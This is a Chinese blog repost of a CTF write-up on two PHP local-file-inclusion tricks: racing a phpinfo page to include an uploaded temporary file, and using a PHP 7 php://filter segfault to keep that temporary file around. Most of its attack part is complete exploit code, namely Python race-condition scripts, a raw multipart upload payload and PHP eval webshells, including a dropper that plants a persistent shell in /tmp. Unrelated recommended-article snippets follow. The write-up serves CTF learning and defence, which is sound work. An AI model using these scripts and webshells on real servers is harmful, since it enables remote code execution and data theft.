.exp文件_文件包含&奇技淫巧

最新推荐文章于 2024-07-10 00:25:29 发布
最新推荐文章于 2024-07-10 00:25:29 发布
阅读量378 收藏 1
点赞数
文章标签: .exp文件 host文件

前言

最近遇到一些文件包含的题目,在本篇文章记录两个trick。

环境背景

复现环境还是很容易搭建的:

例题1(php7)

index.php

<?php
$a = @$_GET['file'];
echo 'include $_GET['file']';
if (strpos($a,'flag')!==false) {
die('nonono');
}
include $a;
?>

dir.php

<?php
$a = @$_GET['dir'];
if(!$a){
$a = '/tmp';
}
var_dump(scandir($a));

例题2(php5)

index.php

<?php
$a = @$_GET['file'];
echo 'include $_GET['file']';
if (strpos($a,'flag')!==false) {
die('nonono');
}
include $a;
?>

phpinfo.php

<?php
phpinfo();
?>

两道题的最终目标都是拿到根目录的flag。

phpinfo+LFI

我们看到例题2:

我们有文件包含,那么我们可以轻易的用伪协议泄露源代码:

file=php://filter/read=convert.base64-encode/resource=index.php

这是老生常谈的问题,无需多讲,重点在于如何去读取根目录的flag。

最容易想到的是利用包含:

http://ip/index.php?file=/flag

但是由于:

if (strpos($a,'flag')!==false) {
die('nonono');
}

我们并不能进行读取,那么很容易想到,尝试getshell。

这里我们可以介绍第一个trick,即利用phpinfo会打印上传缓存文件路径的特性,进行缓存文件包含达到getshell的目的。

我们简单写一个测试脚本:

import requests
from io import BytesIO
files = {
  'file': BytesIO("<?php echo 'sky is cool!';")
}
url = "http://ip/phpinfo.php"
r = requests.post(url=url, files=files, allow_redirects=False)
print r.content

可以看到回显中有如下内容:

_FILES["file"]
Array
(
    [name] => test.txt
    [type] => application/octet-stream
    [tmp_name] => /tmp/phptZQ0xZ
    [error] => 0
    [size] => 26
)

我们只要利用这一特性,进行包含getshell即可。

首先我们利用正则匹配,提取临时文件名:

data = re.search(r"(?<=tmp_name] =&gt; ).*", r.content).group(0)

31d6de508055d8ce5f203a7c5a88b298.png

接下来就是条件竞争的问题:如何在文件临时文件消失前,包含到它。

这里为了事半功倍,我搜集了一些资料和原理:

1.临时文件在phpinfo页面加载完毕后才会被删除。

2.phpinfo页面会将所有数据都打印出来,包括header。

3.php默认的输出缓冲区大小为4096,可以理解为php每次返回4096个字节给socket连接。

(来自ph牛:https://github.com/vulhub/vulhub/tree/master/php/inclusion)

那么我们的竞争流程可以总结为:

1.发送包含了webshell的上传数据包给phpinfo页面,同时在header中塞满垃圾数据。

2.因为phpinfo页面会将所有数据都打印出来,垃圾数据会加大phpinfo加载时间。

3.直接操作原生socket,每次读取4096个字节。只要读取到的字符里包含临时文件名,就立即发送第二个数据包。

4.此时,第一个数据包的socket连接实际上还没结束,因为php还在继续每次输出4096个字节,所以临时文件此时还没有删除。

5.利用这个时间差,在第二个数据包进行文件包含漏洞的利用,即可成功包含临时文件,最终getshell。

同时,对于webshell也有讲究,因为包含过程比较麻烦,如果使用一次性一句话木马:

<?php @eval($_REQUEST[sky]);

则每次执行命令,都要进行一次包含,耗时耗力,所以我们选择包含后写入文件的shell:

<?php file_put_contents('/tmp/sky', '<?php @eval($_REQUEST[sky]);?>');?>

这样一旦包含成功,该shell就会在tmp目录下永久留下一句话木马文件sky,下次利用直接轻松包含即可。

尝试进行exp编写:

import os
import socket
import sys
def init(host,port):
padding = 'sky'*2000
payload="""sky test!<?php file_put_contents('/tmp/sky', '<?php eval($_REQUEST[sky]);?>');?>r"""
request1_data ="""------WebKitFormBoundary9MWZnWxBey8mbAQ8r
Content-Disposition: form-data; name="file"; filename="test.php"r
Content-Type: text/phpr
r
%s
------WebKitFormBoundary9MWZnWxBey8mbAQ8r
Content-Disposition: form-data; name="submit"r
r
Submitr
------WebKitFormBoundary9MWZnWxBey8mbAQ8--r
""" % payload
request1 = """POST /phpinfo.php?a="""+padding+""" HTTP/1.1r
Cookie: skypadding="""+padding+"""r
Cache-Control: max-age=0r
Upgrade-Insecure-Requests: 1r
Origin: nullr
Accept: """ + padding + """r
User-Agent: """+padding+"""r
Accept-Language: """+padding+"""r
HTTP_PRAGMA: """+padding+"""r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9MWZnWxBey8mbAQ8r
Content-Length: %sr
Host: %s:%sr
r
%s""" %(len(request1_data),host,port,request1_data)
request2 = """GET /index.php?file=%s HTTP/1.1r
User-Agent: Mozilla/4.0r
Proxy-Connection: Keep-Aliver
Host: %s:%sr
r
r
"""
return (request1,request2)
def getOffset(host,port,request1):
    """Gets offset of tmp_name in the php output"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(request1)
    d = ""
    while True:
        i = s.recv(4096)
        d+=i       
        if i == "":
            break
        if i.endswith("0rnrn"):
            break
    s.close()
    i = d.find("[tmp_name] =&gt; ")
    if i == -1:
        print 'not fonud'
    
    print "found %s at %i" % (d[i:i+10],i)
    return i+256
def phpinfo_LFI(host,port,offset,request1,request2):
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((host,port))
s2.connect((host,port))
s1.send(request1)
d = ""
while len(d) < offset:
d += s1.recv(offset)
try:
i = d.index("[tmp_name] =&gt; ")
fn = d[i+17:i+31]
s2.send(request2 % (fn,host,port))
tmp = s2.recv(4096)
if tmp.find("sky test!") != -1:
return fn
except ValueError:
    return None
s1.close()
s2.close()
attempts = 1000
host = "ip"
port = "port"
request1,request2 = init(host,port)
offset = getOffset(host,port,request1)
for i in range(1,attempts):
print "try:"+str(i)+"/"+str(attempts)
sys.stdout.flush()
res = phpinfo_LFI(host,port,offset,request1,request2)
if res is not None:
print 'You can getshell with /tmp/sky!'
break

编写还是非常容易的,知道原理后,其实不存在多少条件竞争,最多尝试个10次左右就可以达成目的。

随后我们就可以轻松getshell:

b6bfda47c216a8a69853bbf5d21be996.png

LFI+php7崩溃

前一题我们能做,得益于phpinfo的存在,但如果没有phpinfo的存在,我们就很难利用上述方法去getshell。

但如果目标不存在phpinfo,应该如何处理呢?

这里可以用php7 segment fault特性。

我们可以利用:

http://ip/index.php?file=php://filter/string.strip_tags=/etc/passwd

这样的方式,使php执行过程中出现Segment Fault,这样如果在此同时上传文件,那么临时文件就会被保存在/tmp目录,不会被删除:

8055bcc9c67df612e1ac771f70331650.png

这样就能达成我们getshell的目的,脚本相对容易很多:

549a053ab9769e1657c8414ac588fc35.png

加上我们有dir.php

<?php
$a = @$_GET['dir'];
if(!$a){
$a = '/tmp';
}
var_dump(scandir($a));

可以进行目录列举,我们只要找到临时文件名即可:

编写exp

import requests
from io import BytesIO
import re
files = {
  'file': BytesIO('<?php eval($_REQUEST[sky]);')
}
url = 'http://ip/index.php?file=php://filter/string.strip_tags/resource=/etc/passwd'
try:
r = requests.post(url=url, files=files, allow_redirects=False)
except:
url = 'http://ip/dir.php'
r = requests.get(url)
data = re.search(r"php[a-zA-Z0-9]{1,}", r.content).group(0)
url = "http://ip/index.php?file=/tmp/"+data
data = {
'sky':"readfile('/flag');"
}
r =  requests.post(url=url,data=data)
print r.content

运行即可看到flag

➜  Desktop python myexp2.py
include $_GET['file']flag{LFI_php7~}

后记

两则trick还是挺有意思的,如果出题不注意很容易进行非预期,同时在日常coding时也得注意这些不起眼的问题,一不留神就会被getshell。

本文为 一叶飘零 原创稿件,授权嘶吼独家发布,如若转载,请注明原文地址: https://www. 4hou.com/web/17259.html 更多内容请关注“嘶吼专业版”——Pro4hou
weixin_40006133
关注
使用python编写简单的文件上传exp
CC210231的博客
04-02 2114
最近开始学习使用python进行exp的编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
pdfbox java.lang.outofmemoryerror_Apache PdfBox
weixin_28785657的博客
02-27 551
业务叙述技术是为了业务服务的,所以讨论技术的时候离不开业务场景。故此先进行简述:最近在做一个从数据库读取pdf文件并且解析成文字进行分析的功能。由于本人对垃圾回收也是略有涉猎,因此代码设计上基本不存在本应该回收但是却无法回收的情况。然而,这个程序用springboot启动后一段时间就会出现oom错误,错误日志如下:java.lang.OutOfMemoryError: Java heap spac...
.exp文件_通过pyinstaller打包编译好的pyd文件到exe
weixin_39661881的博客
11-21 552
前段时间写了个数据采集的项目,吭吭哧哧可算是写的差不多可以用了,纯后端,前端由其他同事来搞,和数据库还有 kepserver 打交道,也遇到了不少的坑。kepserver 的坑先不说,先说说打包程序的时候遇到的。先说环境:开发环境 win10 64 位专业版,Python版本:3.7.4,数据库版本 SQL server 2014,kepserver 6.4由于是用 Python 写的,所以打包就...
动态库程序中四种文件的关系:dll、lib、exp、pdb
最新发布
weixin_59345220的博客
07-10 1194
exp文件包含了DLL中所有需要导出的符号的信息,这包括函数和变量等。这个文件的主要使用者是链接器。在链接过程中,链接器使用.exp文件来解析DLL中哪些符号需要被外部访问,并据此构建DLL的导出表。
.exp是什么文件格式
热门推荐
PengPengBlog的博客
08-18 1万+
exp文件是指导出库文件文件,简称导出库文件,它包含了导出函数和数据项的信息。当LIB创建一个导入库,同时它也创建一个导出库文件。如果你的程序链接到另一个程序,并且你的程序需要同时导出和导入到另一个程序中,这个时候就要使用到exp文件
NO.2-13
nigo134的博客
07-27 229
首先利用PHP伪协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" )
bugku ctf strpos数组绕过
qq_42777804的博客
08-10 2687
<?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag); else...
vue有哪些奇技淫巧.md
06-13
vue有哪些奇技淫巧
Git的奇技淫巧.zip
08-03
Git是一个 “分布式版本管理工具”,简单的理解版本管理工具:大家在写东西的时候都用过 “回撤” 这个 功能,但是回撤只能回撤几步,假如想要找回我三天之前的修改,光用 “回撤” 是找不回来的。...
来自小密圈里的那些奇技淫巧.pdf
08-08
标题中提到的“来自小密圈里的那些奇技淫巧”可能是指在特定的技术圈子中分享的一些特殊技巧,用于突破安全限制和进行有效的攻击测试。以下将详细解释文档中提及的各个技巧: 1. EVAL长度限制突破技巧: 在PHP中,`...
渗透中关于dns的奇技淫巧.pdf
12-10
DNS域传送漏洞允许攻击者获取DNS服务器上的所有区域信息,包括A记录、AAAA记录、CNAME、NS记录等。攻击者通常使用`dig`或`host`命令来尝试获取这些信息。例如: - `dig @192.168.5.6 test.com axfr` - `host -l ...
buuctf(探险3)
qq_62046696的博客
08-13 955
if(!strstr($get_flag," ")){ get传参进入的,里面没有空格、str_ireplace(子字符串忽略大小写替换)第二行,就是把get_flag中的cat 换成wctf20220,说白了就是过滤cat那我们先用ls查一下目录可是并没有什么回显,不知道我是哪错了看了大佬解释,说是传入的2e4不需要空格,这些都会自动加上出来了,但是我们查找目录 cat flag中间一定会有空格,的这里肯定是需要一种别的手段绕过一下。...
php if多条件_怎样来php代码审计(改)
weixin_39517241的博客
11-27 217
目录工具和常见的几种思想常见的点一套简单的CMS源码审计总结这篇是关于php;常见的也是php的代码审计,类似java框架,asp.net,python的Django还是有漏洞之类的,只是比较固定和稀少;像php这种语言本身就是弱语言类型(很多点都利用了弱类型比较和转换),功能函数也是奇多(导致了其与sql,xml等语言的花式组合),加之处理一个问题的方法也是奇多(其中就难保不会出现漏洞...
strpos使用不当引发漏洞
qq_37466661的博客
08-08 1197
strpos使用不当引发漏洞
php】strpos引起的问题【转载】
liNewman的博客
11-20 213
php】strpos引起的问题【转载】 原文:http://www.codeceo.com/article/10-php-interview-need-think.html $str1 = 'yabadabadoo';$str2 = 'yaba';if (strpos($str1,$str2)) { ...
Oracle中用exp/imp命令参数详解
weixin_33752045的博客
09-14 133
Oracle中用exp/imp命令参数详解【用 exp 数 据 导 出】:1 将数据库TEST完全导出,用户名system 密码manager 导出到D:\daochu.dmp中expsystem/manager@TEST rows=y indexes=y compress=n buffer=65536 feedback=100000full=y fil...
.exp文件_CTF中文件上传及文件包含粗略总结
weixin_39619433的博客
11-22 632
文件上传】一、前端检查前端对文件后缀进行检查,该种通过抓包修改数据包即可解决二、文件名检查(1)大小写绕过在windows下,可以将后缀写为pHp(2)unicode当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp(3)php3457该项为apache专属关键点在/etc/apache2/mods-available/php5.6.c...
php本地文件包含漏洞,php文件包含漏洞利用小结
weixin_31860973的博客
03-09 1860
漏洞概述:文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件,从而导致恶意代码的执行及敏感信息的泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式。产生原因:在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入利用条件:1、用户能够控制这个动态变量2、include()等函数通...
"0034Git规范指令大全及奇技淫巧分享
与回撤功能不同,Git可以记录每次的修改,包括文件的增删和内容的修改。通过提交到版本仓库,我们可以找回任何时刻的状态。 下面是常用的Git命令和一些小技巧,可以通过页面内查找的方式进行快速查询: 1. Git初始...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值